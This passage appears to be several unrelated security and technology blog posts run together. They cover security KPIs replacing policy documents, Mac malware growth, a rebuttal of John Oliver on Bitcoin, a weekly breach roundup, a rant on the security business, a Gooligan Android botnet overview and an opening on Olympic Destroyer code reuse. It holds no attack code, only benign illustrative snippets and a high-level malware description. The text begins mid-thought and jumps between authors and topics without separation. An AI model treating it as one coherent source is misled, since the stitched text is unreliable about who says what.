Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.

Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.

End Dusty Tomes and (most) Out-of-Band Guidance

The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.

Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.

Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.

KPIs as Policies (et al.)

If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.

Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.

Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.
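As a concrete sketch, a written requirement like "critical patches must be applied within 14 days" converts naturally into a measurable KPI. The field names, sample dates, and 14-day threshold below are illustrative:

```python
from datetime import date

# Each record: (patch released, patch applied) for one critical finding.
patch_records = [
    (date(2018, 3, 1), date(2018, 3, 9)),
    (date(2018, 3, 2), date(2018, 3, 30)),
    (date(2018, 3, 5), date(2018, 3, 12)),
]

SLA_DAYS = 14  # the measurable objective taken from the written requirement

latencies = [(applied - released).days for released, applied in patch_records]
within_sla = sum(1 for days in latencies if days <= SLA_DAYS)

# The KPI: percentage of critical patches applied within the SLA window.
kpi = 100.0 * within_sla / len(patch_records)
print(f"patch SLA compliance: {kpi:.1f}%")
```

The point of the exercise is that the number feeds a dashboard directly, where a prose policy clause never could.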

Better Reporting and the Path to Accountability

Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.

This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.

There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs, too. In fact, thinking about pulling in SOAR capabilities and other monitoring and assessment capabilities and data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance risk vs. reward in providing strategic guidance for addressing information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to nonetheless watch. But I have digressed...

The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.

Warning as Mac malware exploits climb 270%

Reputable anti-malware security vendor Malwarebytes is warning Mac users that malware attacks against the platform climbed 270 percent last year.

Be careful out there

The security experts also warn that four new malware exploits targeting Macs have been identified in the first two months of 2018, noting that many of these exploits were identified by users, rather than security firms.

In one instance, a Mac user discovered that their DNS settings had been changed and found themselves unable to change them back.


What John Oliver gets wrong about Bitcoin

John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere in the show does he describe what Bitcoin is and how it works.

Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you sign the transaction with your secret key, assigning ownership to my public key, with no third party involved that can reverse the transaction, and essentially no overhead.

All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.

Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't.

Sticking to Satoshi's original ideas is a lot better than trying to repeat how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver's answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.

This is wrong. A better way of approaching the question is to ask why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation": as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.
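Compounding makes that 2% figure bigger than it sounds; a quick back-of-the-envelope calculation:

```python
# At ~2% annual inflation, a dollar's purchasing power after n years
# is 0.98 ** n of its starting value.
for years in (10, 30):
    remaining = 0.98 ** years
    print(f"after {years} years: {remaining:.0%} of original purchasing power")
# After 30 years the dollar buys only a bit over half of what it once did.
```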

The reason the value of the dollar changes is largely that the Federal Reserve manages the supply of dollars, following the law of Supply and Demand. As you know, if supply decreases (as with oil), the price goes up, and if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing each dollar to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases the supply, so that the dollar is worth less.

The reason money follows the law of Supply and Demand is that people use money; they consume it like they do other goods and services, such as gasoline, tax preparation, food, and dance lessons. It's not like a fine art painting, a stamp collection, or a Beanie Baby; money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call one side of this transaction "money" and the other "goods" is purely arbitrary; you could just as well call gasoline the money and dollars the good being bought and sold for gasoline.

The reason dollars are the product of choice is that trying to use gasoline as money is a pain in the neck: storing it and exchanging it is difficult. Goods like this do become money; famously, prisons often use cigarettes as a medium of exchange, even among non-smokers, but the good has to be fungible, storable, and easily exchanged. Dollars are the most fungible, the most storable, and the most easily exchanged, so they have the most value as "money". Sure, the mechanic can fix the farmer's car for three chickens instead, but most of the time both parties in the transaction would rather exchange the same value using dollars than chickens.

So the value of dollars is not like the value of Beanie Babies, which people might buy for $15,000 and whose value changes purely on the whims of investors. Instead, a dollar is like gasoline, which obeys the law of Supply and Demand.

This brings us back to the question of where Bitcoin gets its value. While Bitcoin is indeed used like dollars to buy things, that's only a tiny use of the currency, so its value isn't determined by Supply and Demand. Instead, the value of Bitcoin is a lot like that of Beanie Babies, obeying the laws of investments. So in this respect, Oliver is right about where the value of Bitcoin comes from, but wrong about where the value of dollars comes from.

Why a Bitcoin conference didn't take Bitcoin

John Oliver points out the irony of a Bitcoin conference that stopped accepting payments in Bitcoin for tickets.

The biggest reason for this is because Bitcoin has become so popular that transaction fees have gone up. Instead of being proof of failure, it's proof of popularity. What John Oliver is saying is the old joke that nobody goes to that popular restaurant anymore because it's too crowded and you can't get a reservation.

Moreover, the point of Bitcoin is not to replace everyday currencies for everyday transactions. If you read Satoshi Nakamoto's whitepaper, its only goal is to replace certain types of transactions, like purely electronic transactions where electronic goods and services are being exchanged. Where real-life goods/services are being exchanged, existing currencies work just fine. It's only the crazy activists who claim Bitcoin will eventually replace real world currencies -- the saner people see it co-existing with real-world currencies, each with a different value to consumers.

Turning a McNugget back into a chicken

John Oliver uses the metaphor that while you can process a chicken into McNuggets, you can't reverse the process and turn a McNugget back into a chicken. It's a funny metaphor.

But it's not clear what the heck this metaphor is trying to explain. It's not a metaphor for the blockchain, but for a "cryptographic hash", where each block is a chicken, and the McNugget is the signature for the block (well, the block plus the signature of the previous block, forming a chain).

Even then, the metaphor has problems. For it to accurately describe a cryptographic hash, the McNugget produced from each chicken must be unique to that chicken. You can therefore identify the original chicken simply by looking at the McNugget. A slight change in the original chicken, like losing a feather, results in a completely different McNugget. Thus, nuggets can be used to tell if the original chicken has changed.

This then leads to the key property of the blockchain: it is unalterable. You can't go back and change any of the blocks of data, because the fingerprints, the nuggets, will also change and break the nugget chain.
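That unalterable-chain property is just a hash chain, and takes only a few lines to demonstrate; a minimal Python sketch with made-up block contents:

```python
import hashlib

def nugget(block: bytes, prev: bytes) -> bytes:
    # Each "nugget" fingerprints the block plus the previous nugget,
    # chaining the blocks together.
    return hashlib.sha256(prev + block).digest()

def chain(blocks):
    h = b"\x00" * 32  # genesis placeholder
    nuggets = []
    for block in blocks:
        h = nugget(block, h)
        nuggets.append(h)
    return nuggets

blocks = [b"alice pays bob 1", b"bob pays carol 2", b"carol pays dave 3"]
original = chain(blocks)

# Tampering with the first block changes its nugget AND every later one,
# so the alteration is detectable anywhere down the chain.
tampered = chain([b"alice pays bob 9"] + blocks[1:])
assert original[0] != tampered[0]
assert original[-1] != tampered[-1]
```

Real blockchains add mining, consensus, and Merkle trees on top, but this chaining of fingerprints is the part the McNugget metaphor was reaching for.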

The point is that John Oliver is laughing at a silly metaphor for the blockchain because he totally misses the point of the metaphor.

Oliver rightly says "don't worry if you don't understand it -- most people don't", but that includes the big companies that John Oliver names. Some companies do get it and are producing reasonable things (like JP Morgan, by all accounts), but some don't. IBM and other big consultancies are charging companies millions of dollars to consult with them on blockchain products where nobody involved, the customer or the consultancy, actually understands any of it. That doesn't stop them from happily charging customers on one side and happily spending money on the other.

Thus, rather than Oliver explaining the problem, he's just being part of the problem. His explanation of blockchain left you dumber than before.


John Oliver mocks the Brave ICO ($35 million in 30 seconds), claiming it's all driven by YouTube personalities and people who aren't looking at the fundamentals.

And while this is true, and most ICOs are bunk, the Brave ICO actually had a business model behind it. Brave is a Chrome-like web browser whose distinguishing feature is that it protects your privacy from advertisers. If you don't use Brave or a browser with an ad-block extension, you have no idea how bad things are for you. However, this presents a problem for websites that fund themselves via advertisements, which is most of them, because visitors no longer see ads. Brave has a fix for this. Most people wouldn't mind supporting the websites they visit often, like the New York Times. That's where the Brave ICO "token" comes in: it's not simply stock in Brave, but a token for micropayments to websites. Users buy tokens, then use them for micropayments to websites like the New York Times. The New York Times then sells the tokens back to the market for dollars. The buying and selling of tokens happens without a centralized middleman.

This is still all speculative, of course, and it remains to be seen how successful Brave will be, but it's a serious effort. It has well-respected VCs behind the company, a well-respected founder (despite the fact that he invented JavaScript), and well-respected employees. It's not a scam; it's a legitimate venture.

How do you make money from Bitcoin?

The last part of the show is dedicated to describing all the scams out there, advising people to be careful and to be "responsible". This is garbage.

It's like my simple two-step process for making lots of money via Bitcoin: (1) buy when the price is low, and (2) sell when the price is high. My advice is correct, of course, but useless. Same as "be careful" and "invest responsibly".

The truth about investing in cryptocurrencies is "don't". The only responsible way to invest is to buy low-overhead market index funds and hold for retirement. No, you won't get super rich doing this, but anything other than this is irresponsible gambling.

It's a hard lesson to learn, because everyone is telling you the opposite. The entire channel CNBC is devoted to day traders, who buy and sell stocks at a high rate based on the same principle as a Ponzi scheme, basing their judgment not on the fundamentals (like long-term dividends) but on the animal spirits of whatever stock is hot or cold at the moment. This is the same reason people buy or sell Bitcoin: not because they can describe its fundamental value, but because they believe a bigger fool down the road will buy it for even more.

For things like Bitcoin, the trick to making money was to have bought it over 7 years ago, when it was essentially worthless except to nerds who were into that sort of thing. It's the same trick to making a lot of money in Magic: The Gathering trading cards, which nerds bought decades ago and which are worth a ton of money now. Or to have bought Apple stock back in 2009, when the iPhone was new and nerds could understand the potential of real Internet access and apps in a way that Wall Street could not.

That was my strategy: be a nerd who gets into things. I've made a good amount of money on all these things because, as a nerd, I was into Magic: The Gathering, Bitcoin, and the iPhone before anybody else was, and bought in at the point where these things were essentially valueless.

At this point with cryptocurrencies, with the non-nerds now flooding the market, there's little chance of making it rich. The lottery is probably a better bet. Instead, if you want to make money, become a nerd, obsess about a thing, understand it while it's new, and cash out once the rest of the market figures it out. That might be Brave, for example, but buy into it because you've spent the last year studying the browser advertisement ecosystem, the market's willingness to pay for content, and how their Basic Attention Token delivers value to websites -- not because you want in on the ICO craze.


John Oliver spends 25 minutes explaining Bitcoin, cryptocurrencies, and the blockchain to you. Sure, it's funny, but it leaves you worse off than when it started. He admits they "simplify" the explanation, but they simplified it so much that they removed all the useful information.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebee's, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017, to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that an unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.


Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Wray, that meant the FBI could not access more than half of the devices it tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Wray said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the House.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

Security is not a buzz-word business model, but our cumulative effort


This article conveys my personal opinion on security and its underlying revenue model; I recommend reading it with a pinch of salt (plus tequila, while we are at it). I shall cover both sides of the coin: heads, where pentesters try to give you a heads-up on underlying issues, and tails, where businesses still think they can address security at the tail end of their development.

A recent conversation with a friend who works in information security prompted me to address the elephant in the room. He works at a security services firm that provides intelligence feeds and alerts to its clients. He shared a case where his firm didn't deliver the right feed at the right time, even though the client was "vulnerable," because the client was on a different subscription tier. I understand business is essential, but isn't security a collective effort? Tomorrow, when this client gets attacked, are you going to turn a blind eye because it didn't pay you enough? I understand that remediation always costs money (or extra effort), but withholding an alert about an attack you witnessed in the wild based on how much a client pays you is hard to defend.

I don't dream of a utopian world where security is a given, but we can surely walk in that direction.

What is security to a business?

Is it a domain, a pillar, or, with the buzz these days, insurance? Information security and privacy, while being the talk of the town, still come in only where the business requirements end. I understand there is a paradigm shift to the left, a movement toward the inception of your "bright idea," but we are still far from an ideal world, the utopia so to speak. I have experience on either side of the table: the one where we put ourselves in the shoes of hackers, and the other where we hold hands with developers to understand their pain points and work together to build a secure ecosystem. I would say it's been very few times that a business pays attention to "security" from day zero (yeah, this tells you the kind of clients I deal with and why we are in business). Often business owners say: develop this application based on these requirements, discuss the revenue model and maintenance costs, and, oh yes, check whether we need these security add-ons or whether we adhere to compliance checks, as no one wants auditors knocking at the door for all the wrong reasons.

This troubles me. Why don't we treat information security as a pillar as important as your whole revenue model?


How is security as a business?

I have many issues with how "security" is tossed around as a buzzword to earn dollars, while very few respect the gravity or the very objective of its existence. Whether it's information, financial, or life security, they all have very real and quantifiable effects on someone's well-being. Every month, I see tens (if not hundreds) of reports and advisories whose quality is embarrassingly bad. When you dig for the reasons, it's either that the "good" firms are costly, or someone has a comfort zone with existing firms, or, worst of all, the business neither cares nor pressures firms for better quality. In the end, it's just a plain and straightforward business transaction, or a compliance check to make the auditor happy.

Have you ever asked yourself these questions?

  1. To you, the pentester: you did a pentest and billed accordingly for your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put your best consultants on it because they were too expensive for the cause? That you didn't walk the extra mile because the budgeted hours ran out?
  2. Now, to you, Mr. Business CEO: you want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, and security expenditure seems dubious to you. Next time, check how much companies have lost after getting breached. Just because it's not an urgent problem doesn't mean it can't become one; and if it does, chances are it's too late. These issues are like symptoms: if you can see them, you are already in trouble. Security doesn't always have an immediate ROI, I understand, but don't make it the epitome of "out of sight, out of mind." That's a significant risk you are taking with your revenue, employees, and customers.

Now that I have touched on both sides of the problem in this short article, I hope you got the message (fingers crossed). Please take security seriously, and not only as a business transaction. Every time you do something that involves security, on either side, think: would you invest your next big cryptocurrency in an exchange or market that gets hacked because of its lack of due diligence? Would you want your medical records to become public because someone didn't perform a good pentest? Or to lose your savings because your bank didn't do a thorough security check of its infrastructure? If you think you are untouchable behind your home router's security, you, my friend, are living in an illusion. And my final rant goes to the firms with good consultants whose reporting, or seriousness in delivering the message to the business, is so fcuking messed up that all their efforts go in vain. Take your deliverable seriously; it's the only window the business has to peep into the issues (existing or foreseen) and plan remediation in time.

That's all, my friends. Stay safe and be responsible; security is a cumulative effort, and everyone has to be vigilant because you never know where the next cyber-attack will be.

Taking down Gooligan: part 1 — overview

This series of posts recounts how, in November 2016, we hunted for and took down Gooligan, the infamous Android OAuth stealing botnet. What makes Gooligan special is its weaponization of OAuth tokens, something that was never observed in mainstream crimeware before. At its peak, Gooligan had hijacked over 1M OAuth tokens in an attempt to perform fraudulent Play store installs and reviews.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

While I rarely talk publicly about it, a key function of our research team is to assist product teams when they face major attacks. Gooligan’s very public nature and the extensive cross-industry collaboration around its takedown provided the perfect opportunity to shed some light on this aspect of our mission.

Being part of the emergency response task force is a central aspect of our team's work, as it allows us to focus on helping our users when they need it the most and exposes us to tough challenges in real time, as they occur. Overcoming these challenges fuels our understanding of the security and abuse landscape. Quite a few of our most successful research projects started from these escalations, including our work on fake phone verified accounts, the study of HTTPS interception, and the analysis of mail delivery security.

Subjects covered in this post

Given the complexity of this subject, I broke it down into three posts to ensure that I can provide a full debrief of what went down and cover all the major aspects of the Gooligan escalation. This first post recounts the Gooligan origin story and offers an overview of how Gooligan works. The second post provides an in-depth analysis of Gooligan’s inner workings and of its network infrastructure. The final post discusses Gooligan’s various monetization schemes and its takedown.

This series of posts is modeled after the talk I gave with Oren Koriat from Check Point, at Botconf in December 2017, on the subject. Here is a re-recording of the talk:

You can get the slides here but they are pretty bare.

As OAuth token abuse is Gooligan’s key innovation, let’s start by quickly summarizing how OAuth tokens work, so it is clear why this is such a game changer.

What are OAuth tokens?

OAuth app list

OAuth tokens are the de facto standard for granting apps and devices restricted access to online accounts without sharing passwords and with a limited set of privileges. For example, you can use an OAuth token to only allow an app to read your Twitter timeline, while preventing it from changing your settings or posting on your behalf.

OAuth flow

Under the hood, the service provides the app, on your behalf, with an OAuth token that is tied to the exact privileges you want to grant. In a similar (though not identical) way, when you sign in with your Google account on an Android device, Google gives the device a token that allows it to access Google services on your behalf. This is the long-term token that Gooligan stole in order to impersonate users on the Play Store. You can read more about Android long-term tokens here.
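To make the scope-limiting idea concrete, here is a minimal, self-contained Python sketch of how an authorization server might tie a token to a set of scopes, and how a resource server then checks the scope before honoring a request. All names (`grant_token`, `authorize`, the scope strings) are purely illustrative and do not correspond to Google's or Twitter's actual APIs.

```python
import secrets

# Hypothetical in-memory token store of an authorization server.
TOKENS = {}

def grant_token(user, scopes):
    """Issue an opaque token limited to the requested scopes."""
    token = secrets.token_hex(16)
    TOKENS[token] = {"user": user, "scopes": set(scopes)}
    return token

def authorize(token, required_scope):
    """Resource-server check: the token must carry the scope being exercised."""
    info = TOKENS.get(token)
    return info is not None and required_scope in info["scopes"]

# A token granted only read access cannot be used to post on the user's behalf.
t = grant_token("alice", ["timeline.read"])
print(authorize(t, "timeline.read"))   # True
print(authorize(t, "status.write"))    # False
```

The point of the sketch is the asymmetry Gooligan exploited: whoever holds the token gets exactly the privileges it was minted with, with no further password check, which is why a stolen long-term token is so valuable.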


Gooligan overview

Overall, Gooligan is made of six key components:

  • Repackaged app: This is the initial payload, usually a popular app that was repackaged and weaponized. The APK embeds a secondary hidden/encrypted payload.
  • Registration server: Records device information when a device joins the botnet after being rooted.
  • Exploit server: The exploit server is the system that will deliver the exact exploit needed to root the device, based on the information provided by the secondary payload. Having the device information is essential, as Kingroot only targeted unpatched older devices (4.x and below). The post-rooting process is also responsible for backdooring the phone recovery process to enable persistence.
  • Fraudulent app and ads C&C: This infrastructure is responsible for collecting exfiltrated data and telling the malware which (non-Google related) ads to display and which Play store app to boost.
  • Play Store app module: This is an injected library that allows the malware to issue commands to the Play store through the Play store app. This complex process was set up in an attempt to avoid triggering Play store protection.
  • Ads fraud module: This is a module that would regularly display ads to the users as an overlay. The ads were benign and came from an ad company that we couldn’t identify.


Analyzing Gooligan’s code allowed us to trace it back to earlier malware families, as it built upon their codebase. While those families are clearly related code-wise, we can't ascertain whether the same actor is behind all of them, because a lot of the shared features were extensively discussed in Chinese blogs.

Gooligan timeline

SnapPea the precursor

As visible in the timeline above, Gooligan’s genesis can be traced back to the SnapPea adware that emerged in March 2015 and was discovered by Check Point in July of the same year. SnapPea’s key innovation was the weaponization of the exploit kit Kingroot, which until then was used by enthusiasts to root their phones and install custom ROMs.

Blog post announcing SnapPea discovery

SnapPea’s straightforward weaponization of Kingroot led to a rather unusual infection vector: its authors resorted to backdooring the backup application SnapPea to infect victims. After an Android device was physically connected to an infected PC, the malicious SnapPea application used Kingroot to root the device and install malware on it. Gooligan is related to SnapPea in that it also uses Kingroot exploits to root devices, but in an untethered way, via a custom remote server.

Following in SnapPea’s footsteps, Gooligan weaponizes the Kingroot exploits to root old, unpatched Android devices.

Ghost Push the role model

Blog post discussing Ghost Push discovery

A few months after SnapPea appeared, Cheetah Mobile uncovered Ghost Push, which quickly became one of the largest Android (off-market) botnets. What set Ghost Push apart technically from SnapPea was the addition of code that allowed it to persist across device resets. This persistence was accomplished by patching, among other things, the recovery script located in the system partition after Ghost Push gained root access in the same way SnapPea did. Gooligan reused the same persistence code.

Gooligan borrowed from Ghost Push the code used to ensure its persistence across device resets.


As outlined in this post, Gooligan is a complex piece of malware that built on previous malware generations and extended them to a brand-new attack vector: OAuth token theft.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

Building on this post, the next one in the series will provide an in-depth analysis of Gooligan’s inner workings and of its network infrastructure. The final post will discuss Gooligan’s various monetization schemes and its takedown.

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter, Facebook, Google+, or LinkedIn. You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS.

A bientôt!

Hunting down Gooligan — retrospective analysis

This talk provides a retrospective on how, during 2017, Check Point and Google jointly hunted down Gooligan, one of the largest Android botnets at the time. Besides its scale, what makes Gooligan a worthwhile case study is its heavy reliance on stolen OAuth tokens to attack Google Play’s API, an approach previously unheard of in malware.

This talk starts by providing an in-depth analysis of how Gooligan’s kill chain works, from infection and exploitation to system-wide compromise. Then, building on various telemetry, we will shed light on which devices were infected and how this botnet attempted to monetize the stolen OAuth tokens. Next, we will discuss how we were able to uncover the Gooligan infrastructure and tie it to another prominent malware family: Ghost Push. Last but not least, we will recount how we went about re-securing the affected users and taking down the infrastructure.

From Russia(?) with Code

The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.

Cyberattack campaigns are often a reflection of real-world tensions and provide insight into the possible suspects in an attack. Much has been written about the perpetrators behind Olympic Destroyer emanating from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the host of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on its team. And Russia has precedent, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti-Doping Agency that was targeted via a stolen International Olympic Committee account.

There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.

But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.

The motivation of our following analysis is not to point the finger of blame about who did the attacking, but to utilize our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.

Initial Samples of Code Reuse

Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components, regardless of whether they are executed at run time. As we described in a blog post a few years ago, this technique is essential if we are to detect any dormant functionality that might be present within the sample.

After decomposing the code components into normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last three years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we can query our backend for any other binaries that reuse significant amounts of code.

The rationale being that actors usually build up their code base over time, and reuse it over and over again across different campaigns. Code surely might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation on Olympic Destroyer further. The first results were obviously some variants of the Olympic Destroyer binaries which we have already mentioned in our previous post. However, it quickly got way more interesting.
